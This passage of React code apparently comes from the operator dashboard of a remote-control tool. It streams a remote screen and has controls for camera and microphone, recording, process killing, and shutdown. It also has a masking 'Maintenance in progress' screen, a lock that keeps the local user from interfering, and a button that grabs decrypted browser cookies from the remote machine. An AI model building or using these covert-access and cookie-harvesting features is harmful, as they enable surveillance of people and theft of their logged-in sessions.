                        <div style={{ padding: '16px', color: '#444', fontSize: 12, textAlign: 'center' }}>No scripts yet — add in Admin panel</div>
                      ) : toolboxScripts.map(script => (
                        <div key={script.id} style={{ padding: '10px 14px', borderBottom: '1px solid #111', cursor: 'pointer' }}
                          onClick={() => runToolboxScript(agent, script)}
                          onMouseEnter={e => e.currentTarget.style.background = '#151520'}
                          onMouseLeave={e => e.currentTarget.style.background = 'transparent'}>
                          <div style={{ color: '#e8e8f0', fontSize: 12, fontWeight: 500 }}>{script.name}</div>
                          {script.description && <div style={{ color: '#555', fontSize: 10, marginTop: 2 }}>{script.description}</div>}
                          <div style={{ color: '#7c6aff', fontSize: 10, fontFamily: 'monospace', marginTop: 3 }}>
                            {script.command.substring(0, 40)}{script.command.length > 40 ? '...' : ''}
                          </div>
                        </div>
                      ))}
                    </div>
                  )}
                </div>
                <button
                  title="Remove from view (agent keeps running)"
                  style={{ background: 'transparent', border: '1px solid #ff444433', borderRadius: 6, padding: '4px 8px', color: '#ff6666', cursor: 'pointer', fontFamily: 'inherit', fontSize: 10 }}
                  onClick={e => { e.stopPropagation(); deleteAgent(agent); }}>
                  ✕ Hide
                </button>
                <button
                  title="Permanently uninstall from this machine"
                  style={{ background: 'transparent', border: '1px solid #ff222233', borderRadius: 6, padding: '4px 8px', color: '#ff4444', cursor: 'pointer', fontFamily: 'inherit', fontSize: 10 }}
                  onClick={e => { e.stopPropagation(); uninstallAgent(agent); }}>
                  🗑 Uninstall
                </button>
                <button
                  onClick={() => restartAgent(agent)}
                  style={{ padding: '4px 8px', fontSize: 12, borderRadius: 5, background: '#f59e0b', color: '#111', border: 'none', cursor: 'pointer' }}>
                  ⟳ Restart
                </button>
                <div style={styles.connectArrow}>
                  <span style={{ fontSize: 11, color: '#7c6aff', marginRight: 4 }}>Connect</span>
                  <span style={{ color: '#7c6aff' }}>→</span>
                </div>
              </div>
            </div>
          ))}

          {/* OFFLINE AGENTS */}
          {(() => {
            const offlineAgents = registeredAgents.filter(r => !r.online && !clearedOffline.includes(r.deviceId));
            if (offlineAgents.length === 0) return null;
            return (
              <div style={{ marginTop: 24 }}>
                <div
                  onClick={() => setShowOffline(v => !v)}
                  style={{
                    color: '#666',
                    fontSize: 11,
                    letterSpacing: 2,
                    marginBottom: 10,
                    paddingLeft: 4,
                    cursor: 'pointer',
                    userSelect: 'none',
                    display: 'flex',
                    alignItems: 'center',
                    gap: 8,
                  }}>
                  <span style={{
                    display: 'inline-block',
                    transition: 'transform 0.15s',
                    transform: showOffline ? 'rotate(90deg)' : 'rotate(0deg)',
                    fontSize: 10,
                  }}>▶</span>
                  <span>OFFLINE AGENTS ({offlineAgents.length})</span>
                  <span style={{ flex: 1 }} />
                  {showOffline && (
                    <button
                      onClick={(e) => { e.stopPropagation(); saveCleared([...new Set([...clearedOffline, ...offlineAgents.map(a => a.deviceId)])]); }}
                      style={{ background: '#1f0a0a', color: '#ff6a6a', border: '1px solid #ff444433', borderRadius: 6, fontSize: 10, padding: '3px 10px', cursor: 'pointer', letterSpacing: 1 }}>
                      CLEAR
                    </button>
                  )}
                </div>
                {showOffline && offlineAgents.map(agent => (
                  <div key={agent.deviceId} style={{
                    background: '#0a0a12',
                    border: '1px solid #1a1a2e',
                    borderRadius: 12,
                    padding: '14px 16px',
                    marginBottom: 10,
                    display: 'flex',
                    justifyContent: 'space-between',
                    alignItems: 'center',
                  }}>
                    <div>
                      <div style={{ display: 'flex', alignItems: 'center', gap: 8, marginBottom: 4 }}>
                        <span style={{ color: '#ff4444', fontSize: 8 }}>●</span>
                        <span style={{ color: '#555', fontSize: 13, fontWeight: 600 }}>
                          {agent.name}
                        </span>
                      </div>
                      <div style={{ color: '#333', fontSize: 11 }}>
                        {agent.os} · {agent.screenWidth}×{agent.screenHeight}
                      </div>
                      <div style={{ color: '#333', fontSize: 11, marginTop: 2 }}>
                        v{agent.agentVersion} · {agent.streamMode === 'webrtc' ? 'WebRTC' : 'Screenshot'}
                      </div>
                      <div style={{ color: '#2a2a3a', fontSize: 10, marginTop: 4 }}>
                        Last seen: {(() => {
                          const d = new Date(agent.lastSeen);
                          const diff = Date.now() - d.getTime();
                          const mins = Math.floor(diff / 60000);
                          const hrs = Math.floor(mins / 60);
                          const days = Math.floor(hrs / 24);
                          if (days > 0) return `${days}d ago`;
                          if (hrs > 0) return `${hrs}h ago`;
                          if (mins > 0) return `${mins}m ago`;
                          return 'just now';
                        })()}
                      </div>
                    </div>
                    <div style={{ color: '#2a2a3a', fontSize: 10, textAlign: 'right' }}>
                      <div>First seen</div>
                      <div>{new Date(agent.firstSeen).toLocaleDateString()}</div>
                    </div>
                  </div>
                ))}
              </div>
            );
          })()}

        </div>
      </div>
    </div>
  );

  if (screen === 'control') return (
    
    // <div ref={controlRef} style={styles.controlContainer} onKeyDown={handleKeyDown} onKeyUp={handleKeyUp} tabIndex={0} onContextMenu={e => e.preventDefault()}>
      <div ref={controlRef} style={styles.controlContainer} onContextMenu={e => e.preventDefault()}>
      {promptModal}
      <div style={styles.controlBar}>
        <div style={{ display: 'flex', flexDirection: 'column', gap: 2 }}>
          <div style={{ display: 'flex', alignItems: 'center', gap: 8 }}>
            {isConnected && <span className="bl-pulse" style={{ color: '#4cff91', fontSize: 8 }}>●</span>}
            <span style={styles.logo}>⬡ {tagFor(activeAgent?.deviceId) || activeAgent?.name}</span>
            {tagFor(activeAgent?.deviceId) && <span style={{ color: '#666', fontSize: 11, marginLeft: 6 }}>{activeAgent?.name}</span>}
          </div>
          {agentLocation && <span style={{ color: '#ffaa00', fontSize: 11 }}>{agentLocation}</span>}
          {activeAgent?.ip && <span style={{ color: '#444', fontSize: 10 }}>{activeAgent.ip.replace('::ffff:', '')}</span>}
        </div>
        <div style={styles.controlBarCenter}>
          <span style={{ ...styles.statusBadge, background: isConnected ? '#0a1f0a' : agentOffline ? '#1f0a0a' : '#1a1a0d', color: isConnected ? '#4cff91' : agentOffline ? '#ff4444' : '#ffaa00', border: `1px solid ${isConnected ? '#4cff9133' : agentOffline ? '#ff444433' : '#ffaa0033'}` }}>
            {agentOffline ? '⚠ Offline' : isConnected ? '● Connected' : status}
          </span>
          <span style={{ ...styles.screenStatusBadge, background: screenStatus === 'on' ? '#0a1f0a' : '#1f0a0a', color: screenStatus === 'on' ? '#4cff91' : '#ff4444', border: `1px solid ${screenStatus === 'on' ? '#4cff9133' : '#ff444433'}` }}>
            {screenStatus === 'on' ? '🖥 On' : '🔲 Off'}
          </span>
          <span style={styles.timerBadge}>⏱ {formatTime(sessionTime)}</span>
          {activeAgent && <span style={styles.screenInfo}>{activeAgent.screenWidth}×{activeAgent.screenHeight}</span>}
          {userActive && (
            <span style={{ fontSize: 11, padding: '4px 12px', borderRadius: 20, background: '#231400', color: '#ffb84d', border: '1px solid #ffaa0066', animation: 'pulse 1s ease-in-out infinite', whiteSpace: 'nowrap' }}
              title="Someone is physically using the remote machine (moved the mouse or typed)">
              👤 User active · mouse/keyboard
            </span>
          )}
          {latency !== null && (
            <span onClick={() => setAutoQuality(v => !v)} title={autoQuality ? 'Auto-quality ON — resolution follows the connection. Click to turn off.' : 'Auto-quality OFF. Click to let resolution follow the connection.'}
              style={{ cursor: 'pointer', fontSize: 11, padding: '4px 10px', borderRadius: 20, fontFamily: 'inherit', background: quality === 'excellent' ? '#0a1f0a' : quality === 'good' ? '#0a1a0a' : quality === 'fair' ? '#1a1400' : '#1f0a0a', color: quality === 'excellent' ? '#4cff91' : quality === 'good' ? '#7cff7c' : quality === 'fair' ? '#ffaa00' : '#ff4444', border: `1px solid ${quality === 'excellent' ? '#4cff9133' : quality === 'good' ? '#7cff7c33' : quality === 'fair' ? '#ffaa0033' : '#ff444433'}` }}>
              📶 {latency}ms{autoQuality ? ' · Auto' : ''}
            </span>
          )}
        </div>
        <div className="bl-ctrlbar-right" style={styles.controlBarRight}>
          {monitors.length > 1 && (
            <div style={{ position: 'relative' }}>
              <button className="bl-icon-btn" style={styles.monitorBtn} onClick={() => setShowMonitors(!showMonitors)}>🖥 {activeMonitor}</button>
              {showMonitors && (
                <div style={styles.monitorDropdown} className="bl-fade">
                  {monitors.map(m => (
                    <div key={m.index} className="bl-monitor-opt" style={{ ...styles.monitorOption, background: activeMonitor === m.index ? '#1a2a1a' : 'transparent', color: activeMonitor === m.index ? '#4cff91' : '#aaa' }} onClick={() => switchMonitor(m.index)}>
                      {activeMonitor === m.index ? '● ' : '  '}Monitor {m.index} — {m.width}×{m.height}
                    </div>
                  ))}
                </div>
              )}
            </div>
          )}
          <button className="bl-icon-btn" style={{ ...styles.fullscreenBtn, background: mouseEnabled ? '#0d1a0d' : '#2a0808', color: mouseEnabled ? '#4cff91' : '#ff4444', border: mouseEnabled ? '1px solid #4cff9166' : '1px solid #ff444466' }} onClick={toggleMouse} title={mouseEnabled ? 'Mouse control ON — click to disable' : 'Mouse control OFF — click to enable'}>
            🖱 {mouseEnabled ? 'ON' : 'OFF'}
          </button>
          <button onClick={pullClipboard} title="Copy the agent's clipboard to yours"
          style={{ padding: '5px 10px', fontSize: 12, background: '#2563eb', color: '#fff',
                  border: 'none', borderRadius: 5, cursor: 'pointer', marginRight: 6 }}>
          ⬇ Get
        </button>
        <button onClick={pushClipboard} title="Send your clipboard to the agent and paste it"
          style={{ padding: '5px 10px', fontSize: 12, background: '#16a34a', color: '#fff',
                  border: 'none', borderRadius: 5, cursor: 'pointer', marginRight: 6 }}>
          ⬆ Send
        </button>
        <button onClick={getImageFromAgent} title="Grab an image from the agent's clipboard"
          style={{ padding: '5px 10px', fontSize: 12, background: '#7c3aed', color: '#fff',
                  border: 'none', borderRadius: 5, cursor: 'pointer', marginRight: 6 }}>
          🖼 Get img
        </button>
        <button onClick={sendImageToAgent} title="Send an image from your clipboard to the agent"
          style={{ padding: '5px 10px', fontSize: 12, background: '#7c3aed', color: '#fff',
                  border: 'none', borderRadius: 5, cursor: 'pointer', marginRight: 6 }}>
          🖼 Send img
        </button>
        {clipboardStatus && (
          <span style={{ color: '#ffaa00', fontSize: 12, marginLeft: 4 }}>{clipboardStatus}</span>
        )}
        <button onClick={() => {
    if (!features.camera) {
      setCameraError('Camera features not available for this user');
      setTimeout(() => setCameraError(''), 4000);
      return;
    }
    cameraOn ? closeCamera() : openCamera();
  }}
  title="Show the agent's camera (a visible indicator appears on their screen)"
  style={{ padding: '5px 10px', fontSize: 12,
           background: cameraOn ? '#c0182b' : (features.camera ? '#7c3aed' : '#555'),
           color: '#fff', border: 'none', borderRadius: 5,
           cursor: 'pointer', marginRight: 6, opacity: features.camera ? 1 : 0.7 }}>
  {cameraOn ? '● Stop Camera' : '📷 Open Camera'}
</button>
{cameraError && <span style={{ color:'#ff6b6b', fontSize:12 }}>{cameraError}</span>}

<button onClick={() => {
    if (!features.audio) {
      setCameraError('Audio features not available for this user');   // reuse your error line
      setTimeout(() => setCameraError(''), 4000);
      return;
    }
    audioOn ? stopListen() : startListen();
  }}
  title="Listen to the agent's microphone"
  style={{ padding:'5px 10px', fontSize:12,
           background: audioOn ? '#c0182b' : (features.audio ? '#0ea5e9' : '#555'),
           color:'#fff', border:'none', borderRadius:5, cursor:'pointer',
           marginRight:6, opacity: features.audio ? 1 : 0.7 }}>
  {audioOn ? '🔇 Stop Listen' : '🔊 Listen'}
</button>

             <button className="bl-icon-btn" style={{ ...styles.fullscreenBtn, background: recording ? '#c0182b' : (recWaiting ? '#b45309' : '#7c3aed'), color: '#fff', border: 'none', minWidth: 64 }} onClick={toggleRecording} title={recording ? 'Stop recording' : (recWaiting ? 'Waiting for the live picture…' : 'Start recording')}>
                        {recording ? <>🔴 {Math.floor(recordingTime/60).toString().padStart(2,'0')}:{(recordingTime%60).toString().padStart(2,'0')}</> : (recWaiting ? '⏳ Waiting…' : '⏺ Record')}
          </button>
          <button className="bl-icon-btn" style={{ ...styles.fullscreenBtn, background: showRecordings ? '#6d28d9' : '#3b2a5e', color: '#fff', border: 'none' }} onClick={() => setShowRecordings(v => !v)} title="View this session's recordings">
            🎬 Recordings{recordings.length ? ` (${recordings.length})` : ''}
          </button>
          <button className="bl-icon-btn" style={{ ...styles.fullscreenBtn, background: '#0ea5e9', color: '#fff', border: 'none' }} onClick={takeScreenshot} title="Take a screenshot of the remote screen">📸 Screenshot</button>
          <button className="bl-icon-btn" style={{ ...styles.fullscreenBtn, background: showKeypad ? '#6d28d9' : '#3b2a5e', color: '#fff', border: 'none' }} onClick={() => setShowKeypad(!showKeypad)} title="Key combos">⌨️ Key Combo</button>
          <button className="bl-icon-btn" style={{ ...styles.privacyBtn, background: privacyOn ? '#c0182b' : '#334155', color: '#fff', border: 'none' }} onClick={togglePrivacy}>
            {privacyOn ? '🔒 Privacy' : '👁 Privacy'}
          </button>
          <button className="bl-icon-btn" style={{ ...styles.fullscreenBtn, background: inputLocked ? '#c0182b' : '#334155', color: '#fff', border: 'none' }} onClick={toggleInputLock} title={inputLocked ? 'Remote input is LOCKED — click to release' : 'Lock the remote keyboard & mouse so the person there cannot interfere'}>
            {inputLocked ? '🔒 Input Locked' : '🔓 Lock Input'}
          </button>
          <button className="bl-icon-btn" style={{ ...styles.fullscreenBtn, background: showTaskMgr ? '#0e7490' : '#334155', color: '#fff', border: 'none' }} onClick={() => showTaskMgr ? setShowTaskMgr(false) : openTaskMgr()} title="Remote task manager">📊 Tasks</button>
          <button className="bl-icon-btn" style={{ ...styles.fullscreenBtn, background: '#b45309', color: '#fff', border: 'none' }} onClick={restartPC} title="Restart the remote PC">🔄 Restart PC</button>
          <button className="bl-icon-btn" style={{ ...styles.fullscreenBtn, background: '#7f1d1d', color: '#fff', border: 'none' }} onClick={shutdownPC} title="Shut down the remote PC">⏻ Shut Down</button>
          <button className="bl-icon-btn" style={{ ...styles.fullscreenBtn, background: showMigrate ? '#0e7490' : '#155e75', color: '#fff', border: 'none' }} onClick={() => { setShowMigrate(!showMigrate); setShowFilePanel(false); setShowChat(false); }} title="Migrate app and browser sessions">🧳 Migrate</button>
          {showMigrate && (
            <div className="bl-panel" style={{ position: 'absolute', bottom: 54, right: 8, width: 300, background: '#0f1626', border: '1px solid #263043', borderRadius: 10, padding: 12, zIndex: 50, color: '#dfe7f5', fontSize: 13, boxShadow: '0 8px 24px rgba(0,0,0,.5)' }}>
              <div style={{ fontWeight: 600, marginBottom: 6 }}>Migrate sessions</div>
              <div style={{ fontSize: 11, color: '#8a97a8', marginBottom: 8 }}>Copy your own logged in app state to or from this machine. Firefox and many apps carry over. Chrome and Edge often need a fresh sign in.</div>
              <div style={{ marginBottom: 6 }}>
                {['firefox', 'chrome', 'edge', 'brave'].map((k) => (
                  <label key={k} style={{ marginRight: 10, cursor: 'pointer' }}>
                    <input type="checkbox" checked={!!migTargets[k]} onChange={(e) => setMigTargets({ ...migTargets, [k]: e.target.checked })} /> {k}
                  </label>
                ))}
              </div>
              {/* [BL-EDIT] Preview what a capture would grab, before packing. */}
              <div style={{ display: 'flex', gap: 6, marginBottom: 8 }}>
                <button className="bl-btn" style={{ ...styles.btn, flex: 1 }} onClick={() => { setStatePreview(null); setMigStatus('Checking sizes...'); sendCommand({ type: 'state:preview', targets: Object.keys(migTargets).filter((k) => migTargets[k]) }); }}>👁 Preview sizes</button>
                <button className="bl-btn" style={{ ...styles.btn, flex: 1 }} onClick={migCapture}>Capture</button>
              </div>
              {statePreview && (
                <div style={{ background: '#0b1220', border: '1px solid #263043', borderRadius: 6, padding: '6px 8px', marginBottom: 8, fontSize: 11 }}>
                  {statePreview.length === 0 && <div style={{ color: '#8a97a8' }}>Nothing selected.</div>}
                  {statePreview.map((it) => (
                    <div key={it.key} style={{ display: 'flex', justifyContent: 'space-between', color: it.exists ? '#dfe7f5' : '#5a6472' }}>
                      <span>{it.key}</span>
                      <span>{it.exists ? `${it.mb} MB` : 'not on this machine'}</span>
                    </div>
                  ))}
                  {statePreview.some((it) => it.exists) && <div style={{ color: '#8a97a8', marginTop: 4 }}>Total: {statePreview.reduce((s, it) => s + (it.mb || 0), 0).toFixed(1)} MB</div>}
                </div>
              )}
              <div style={{ borderTop: '1px solid #263043', margin: '8px 0' }} />
              <select value={migSel} onChange={(e) => setMigSel(e.target.value)} style={{ width: '100%', marginBottom: 6, background: '#1b2230', color: '#dfe7f5', border: '1px solid #263043', borderRadius: 6, padding: 6 }}>
                <option value="">Pick a saved capture...</option>
                {migPkgs.map((p) => (<option key={p.id} value={p.id}>{p.source} · {(p.targets || []).join(', ')} · {new Date(p.time).toLocaleString()}</option>))}
              </select>
              <button className="bl-btn" style={styles.btn} onClick={migRestore}>Restore to this machine</button>
              {/* [BL-EDIT] Grab decrypted Chrome/Edge/Brave cookies from this
                  machine as a file to import into the Session Mover extension.
                  Works even when a folder copy would arrive with dead cookies. */}
              <div style={{ borderTop: '1px solid #263043', margin: '8px 0' }} />
              <div style={{ fontSize: 11, color: '#8a97a8', marginBottom: 6 }}>Or pull Chrome/Edge/Brave logins as a cookie file (import it in the Session Mover extension). Firefox is not included here.</div>
              <button className="bl-btn" style={styles.btn} disabled={cookieBusy}
                onClick={() => {
                  const picked = ['chrome', 'edge', 'brave'].filter((k) => migTargets[k]);
                  const browsers = picked.length ? picked : ['chrome', 'edge', 'brave'];
                  setCookieBusy(true); setMigStatus('Grabbing cookies from ' + browsers.join(', ') + '...');
                  sendCommand({ type: 'cookies:export', browsers });
                }}>{cookieBusy ? 'Grabbing...' : '🍪 Grab browser cookies'}</button>
              {migStatus && <div style={{ fontSize: 11, color: '#8a97a8', marginTop: 8 }}>{migStatus}</div>}
            </div>
          )}
          <button className="bl-icon-btn" style={{ ...styles.fullscreenBtn, background: '#334155', color: '#fff', border: 'none' }} onClick={toggleFullscreen}>{isFullscreen ? '⛶ Exit' : '⛶ Full'}</button>
          <button className="bl-danger-btn" style={styles.backBtn} onClick={goBack}>⏹ End Stream</button>
        </div>
      </div>

      {/* [BL-EDIT] Persistent red banner while privacy mode is ON. */}
      {privacyOn && (
        <div style={{ position: 'fixed', top: 8, left: '50%', transform: 'translateX(-50%)', zIndex: 10000,
                      background: '#c0182b', color: '#fff', padding: '5px 12px', borderRadius: 20,
                      fontSize: 12, fontWeight: 700, letterSpacing: 0.4, boxShadow: '0 2px 12px rgba(0,0,0,.5)',
                      display: 'flex', alignItems: 'center', gap: 10 }}>
          <span>🔒 Privacy ON — "Maintenance in progress"{privacyPct != null ? ` · ${privacyPct}%` : ''}{privacyPaused ? ' (paused)' : ''}</span>
          <button onClick={() => { const p = !privacyPaused; setPrivacyPaused(p); sendCommand({ type: p ? 'privacy:pause' : 'privacy:resume' }); }}
            style={{ background: 'rgba(255,255,255,0.18)', color: '#fff', border: '1px solid rgba(255,255,255,0.4)', borderRadius: 12, padding: '2px 10px', fontSize: 11, cursor: 'pointer', fontWeight: 700 }}>
            {privacyPaused ? '▶ Resume' : '⏸ Pause'}
          </button>
        </div>
      )}
      {/* [BL-EDIT] Banner while the remote keyboard/mouse is locked. */}
      {inputLocked && (
        <div style={{ position: 'fixed', top: privacyOn ? 40 : 8, left: '50%', transform: 'translateX(-50%)', zIndex: 10000,
                      background: '#b45309', color: '#fff', padding: '5px 16px', borderRadius: 20,
                      fontSize: 12, fontWeight: 700, letterSpacing: 0.4, boxShadow: '0 2px 12px rgba(0,0,0,.5)' }}>
          ⌨🖱 REMOTE INPUT LOCKED — only you have control
        </div>
      )}

      {/* [BL-EDIT] Remote task manager panel. */}
      {showTaskMgr && (
        <div className="bl-panel" style={{ position: 'fixed', top: 70, right: 20, width: 380, maxHeight: '70vh', zIndex: 9996,
                      background: '#0f0f18', border: '1px solid #1e1e2e', borderRadius: 12, padding: 12,
                      display: 'flex', flexDirection: 'column', boxShadow: '0 8px 24px rgba(0,0,0,0.5)' }}>
          <div style={{ display: 'flex', alignItems: 'center', gap: 8, marginBottom: 8 }}>
            <b style={{ color: '#dfe7f5', fontSize: 13, flex: 1 }}>📊 Task Manager</b>
            <button className="bl-btn" style={{ ...styles.btn, padding: '4px 10px' }} onClick={refreshProcs}>↻</button>
            <button style={{ background: 'transparent', border: '1px solid #2a2a3a', color: '#8a97a8', borderRadius: 6, padding: '4px 8px', cursor: 'pointer' }} onClick={() => setShowTaskMgr(false)}>✕</button>
          </div>
          <input placeholder="filter by name..." value={procFilter} onChange={(e) => setProcFilter(e.target.value)}
            style={{ marginBottom: 8, background: '#0a0a14', color: '#dfe7f5', border: '1px solid #26303f', borderRadius: 6, padding: '6px 8px', fontSize: 12 }} />
          {procLoading && <div style={{ color: '#8a97a8', fontSize: 12 }}>Loading processes…</div>}
          {!procLoading && (
            <div style={{ overflowY: 'auto', border: '1px solid #1e1e2e', borderRadius: 8 }}>
              {procList.filter(p => !procFilter || (p.name || '').toLowerCase().includes(procFilter.toLowerCase())).slice(0, 200).map((p) => (
                <div key={p.pid} style={{ display: 'flex', alignItems: 'center', gap: 8, padding: '5px 8px', borderBottom: '1px solid #161622', fontSize: 12 }}>
                  <span style={{ flex: 1, color: '#dfe7f5', overflow: 'hidden', textOverflow: 'ellipsis', whiteSpace: 'nowrap' }}>{p.name}</span>
                  <span style={{ color: '#8a97a8', width: 70, textAlign: 'right' }}>{p.mem_mb} MB</span>
                  <button style={{ background: '#7f1d1d', color: '#fff', border: 'none', borderRadius: 5, padding: '3px 8px', cursor: 'pointer', fontSize: 11 }}
                    onClick={() => killProc(p.pid, p.name)} title={`pid ${p.pid}`}>Kill</button>
                </div>
              ))}
              {procList.length === 0 && <div style={{ color: '#8a97a8', fontSize: 12, padding: 8 }}>No processes.</div>}
            </div>
          )}
        </div>
      )}

      {screenAlert && (
        <div style={styles.alert} className="bl-slide">
          <span>⚠️ Screen was turned back on at the remote machine</span>
          <button style={styles.alertClose} onClick={() => setScreenAlert(false)}>✕</button>
        </div>
      )}

      {agentImage && (
        <div onClick={() => setAgentImage(null)}
          style={{ position: 'absolute', inset: 0, background: 'rgba(0,0,0,0.85)', zIndex: 200,
                   display: 'flex', flexDirection: 'column', alignItems: 'center', justifyContent: 'center', gap: 14 }}>
          <div style={{ color: '#aaa', fontSize: 12 }}>Image from the agent's clipboard (click outside to close)</div>
          <img src={agentImage} alt="from agent" onClick={e => e.stopPropagation()}
            style={{ maxWidth: '82%', maxHeight: '68%', borderRadius: 8, border: '1px solid #333', background: '#111' }} />
          <div style={{ display: 'flex', gap: 10 }} onClick={e => e.stopPropagation()}>
            <a href={agentImage} download="agent-image.png"
              style={{ padding: '8px 14px', fontSize: 13, background: '#2563eb', color: '#fff', borderRadius: 6, textDecoration: 'none' }}>⬇ Download</a>
            <button style={{ padding: '8px 14px', fontSize: 13, background: '#16a34a', color: '#fff', border: 'none', borderRadius: 6, cursor: 'pointer' }}
              onClick={async () => {
                try { const b = await (await fetch(agentImage)).blob(); await navigator.clipboard.write([new window.ClipboardItem({ [b.type]: b })]); setClipboardStatus('Copied to your clipboard'); }
                catch (e) { setClipboardStatus('Copy failed — use Download'); }
                setTimeout(() => setClipboardStatus(''), 3000);
              }}>📋 Copy to my clipboard</button>
            <button style={{ padding: '8px 14px', fontSize: 13, background: '#333', color: '#fff', border: 'none', borderRadius: 6, cursor: 'pointer' }}
              onClick={() => setAgentImage(null)}>Close</button>
          </div>
        </div>
      )}
      {agentOffline && (
        <div style={styles.offlineOverlay}>
          <div style={styles.offlineBox} className="bl-fade">
            <div style={{ fontSize: 48, marginBottom: 16 }}>📵</div>
            <div style={styles.offlineTitle}>Agent went offline</div>
            <div style={styles.offlineSub}>Waiting for <strong style={{ color: '#aaa' }}>{activeAgent?.name}</strong> to come back online...</div>
            <div style={{ display: 'flex', alignItems: 'center', gap: 8, color: '#ffaa00', fontSize: 13 }}><span className="bl-spin">⟳</span> Monitoring connection...</div>
            <button className="bl-btn" style={{ ...styles.offlineBackBtn, marginTop: 16 }} onClick={goBack}>← Back to dashboard</button>
          </div>
        </div>
      )}

      {!agentOffline && streamError && screenMode !== 'screenshot' && (
  <div style={styles.streamErrorBanner} className="bl-slide">
    <span className="bl-spin" style={{ flexShrink: 0 }}>⟳</span>
    <span>{streamError}</span>
    {reconnectCountdown > 0 && (
      <span style={{ color: '#ffaa00' }}>Retrying in {reconnectCountdown}s</span>
    )}
    <button
      className="bl-btn"
      style={styles.retryNowBtn}
      onClick={() => {
        if (screenModeRef.current === 'screenshot') return;
        if (reconnectTimerRef.current) clearTimeout(reconnectTimerRef.current);
        if (countdownTimerRef.current) clearInterval(countdownTimerRef.current);
        setReconnectCountdown(0);
        setStreamError('');
        setStreamError('');
        startWebRTC(activeAgentRef.current);
      }}
    >
      Retry now
    </button>
  </div>
)}

{intrusion && (
  <div style={{
    position:'fixed', top:16, left:'50%', transform:'translateX(-50%)',
    background:'#c0182b', color:'#fff', padding:'8px 16px',
    borderRadius:6, fontSize:14, fontWeight:600, zIndex:10000,
    boxShadow:'0 3px 12px rgba(0,0,0,.4)'
  }}>
    ⚠ {intrusion}
  </div>
)}

      {cameraOn && (
  <div style={{
    position: 'fixed',
    ...(camPos ? { left: camPos.x, top: camPos.y } : { right: 20, bottom: 20 }),
    width: camBig ? 560 : camW,
    background: '#000', border: '2px solid #c0182b', borderRadius: 8,
    overflow: 'hidden', zIndex: 9999, boxShadow: '0 4px 18px rgba(0,0,0,.5)',
    resize: 'both', minWidth: 180, maxWidth: '92vw',
  }}>
    <div onMouseDown={startCamDrag}
      style={{ display:'flex', justifyContent:'space-between', alignItems:'center',
               background:'#c0182b', color:'#fff', padding:'5px 8px', fontSize:12, cursor:'move', userSelect:'none' }}>
      <span>{'\u25CF'} Agent Camera</span>
      <span style={{ display:'flex', gap:10 }}>
        <span onMouseDown={(e)=>e.stopPropagation()} onClick={() => setCamBig(v=>!v)} title={camBig?'Shrink':'Expand'} style={{ cursor:'pointer', fontWeight:'bold' }}>{camBig ? '\u2921' : '\u2922'}</span>
        <span onMouseDown={(e)=>e.stopPropagation()} onClick={closeCamera} title="Close" style={{ cursor:'pointer', fontWeight:'bold' }}>{'\u2715'}</span>
      </span>
    </div>
    {camStatus && camStatus !== 'starting'
      ? <div style={{ color:'#ffb4b4', padding:'22px 16px', textAlign:'center', fontSize:13, lineHeight:1.5 }}>
          \uD83D\uDCF7 {/no camera/i.test(camStatus) ? 'This machine has no camera.' : camStatus}
        </div>
      : cameraFrame
        ? <img src={cameraFrame} alt="camera" style={{ width:'100%', display:'block' }} />
        : <div style={{ color:'#888', padding:20, textAlign:'center', fontSize:12 }}>
            <span className="bl-spin" style={{ display:'inline-block', fontSize:20 }}>\u27F3</span>
            <div style={{ marginTop:8 }}>Starting camera...</div>
          </div>}
  </div>
)}

      {showKeypad && (
        <div style={styles.keypadPanel} className="bl-fade">
          <div style={styles.panelLabel}>KEY COMBOS</div>
          <div style={{ display: 'flex', gap: 6, flexWrap: 'wrap' }}>
            {[
              ['Ctrl+Alt+Del', ['Control','Alt','Delete']],
              ['Win+D', ['Meta','d']],
              ['Alt+F4', ['Alt','F4']],
              ['Win+L', ['Meta','l']],
              ['Alt+Tab', ['Alt','Tab']],
              ['Win Key', ['Meta']],
              ['Ctrl+C', ['Control','c']],
              ['Ctrl+V', ['Control','v']],
              ['Ctrl+Z', ['Control','z']],
              ['Ctrl+A', ['Control','a']],
              ['Ctrl+S', ['Control','s']],
              ['Esc', ['Escape']],
            ].map(([label, keys]) => (
              <button key={label} className="bl-icon-btn" style={styles.keypadBtn} onClick={() => sendKeyCombo(keys)}>{label}</button>
            ))}
          </div>
        </div>
      )}

      {loadingScreen && !agentOffline && screenMode !== 'screenshot' && !screenImage && (
        <div style={{ position: 'absolute', top: 0, left: 0, right: 0, bottom: 0, background: 'rgba(0,0,0,0.92)', display: 'flex', flexDirection: 'column', alignItems: 'center', justifyContent: 'center', zIndex: 8999, gap: 20 }}>
          <div style={{ fontSize: 48, animation: 'spin 1.5s linear infinite', display: 'inline-block' }}>⬡</div>
          <div style={{ color: '#7c6aff', fontSize: 16, letterSpacing: 2 }}>{loadingMsg}</div>
          <div style={{ color: '#333', fontSize: 12 }}>Connecting to {activeAgent?.name}...</div>
        </div>
      )}

     <div ref={videoWrapRef} style={styles.videoWrapper}>
        {/* Backup / last frame — always under video so stream never blacks out */}
        {screenImage && (
          <img
            ref={screenImgRef}
            src={screenImage}
            alt="remote-backup"
            draggable={false}
            style={{
              ...styles.video,
              opacity: agentOffline ? 0.15 : (screenMode === 'screenshot' || !streamLive ? 1 : 0),
              zIndex: 1,
              cursor: 'none',
              transition: 'opacity 0.15s',
              transform: zoom !== 1 ? `translate(${pan.x}px, ${pan.y}px) scale(${zoom})` : 'none',
              transformOrigin: '0 0',
              pointerEvents: streamLive ? 'none' : 'auto',
            }}
            onClick={handleVideoClick}
            onContextMenu={handleVideoRightClick}
            onMouseMove={handleVideoMove}
            onMouseLeave={handleVideoLeave}
            onTouchStart={handleTouchStart}
            onTouchEnd={handleTouchEnd}
            onTouchMove={handleTouchMove}
          />
        )}
          <video
            ref={videoRef}
            autoPlay
            playsInline
            muted
            style={{
              ...styles.video,
              opacity: agentOffline ? 0.15 : (screenMode === 'webrtc' && streamLive ? 1 : 0),
              zIndex: 2,
              pointerEvents: (screenMode === 'webrtc' && streamLive) ? 'auto' : (screenImage ? 'none' : 'auto'),
              cursor: 'none',
              background: 'transparent',
              transition: 'opacity 0.15s',
              transform: zoom !== 1 ? `translate(${pan.x}px, ${pan.y}px) scale(${zoom})` : 'none',
              transformOrigin: '0 0',
            }}
            onClick={handleVideoClick}
            onContextMenu={handleVideoRightClick}
            onMouseMove={handleVideoMove}
            onMouseLeave={handleVideoLeave}
            onTouchStart={handleTouchStart}
            onTouchEnd={handleTouchEnd}
            onTouchMove={handleTouchMove}
          />
        {agentCursorPos && !agentOffline && (
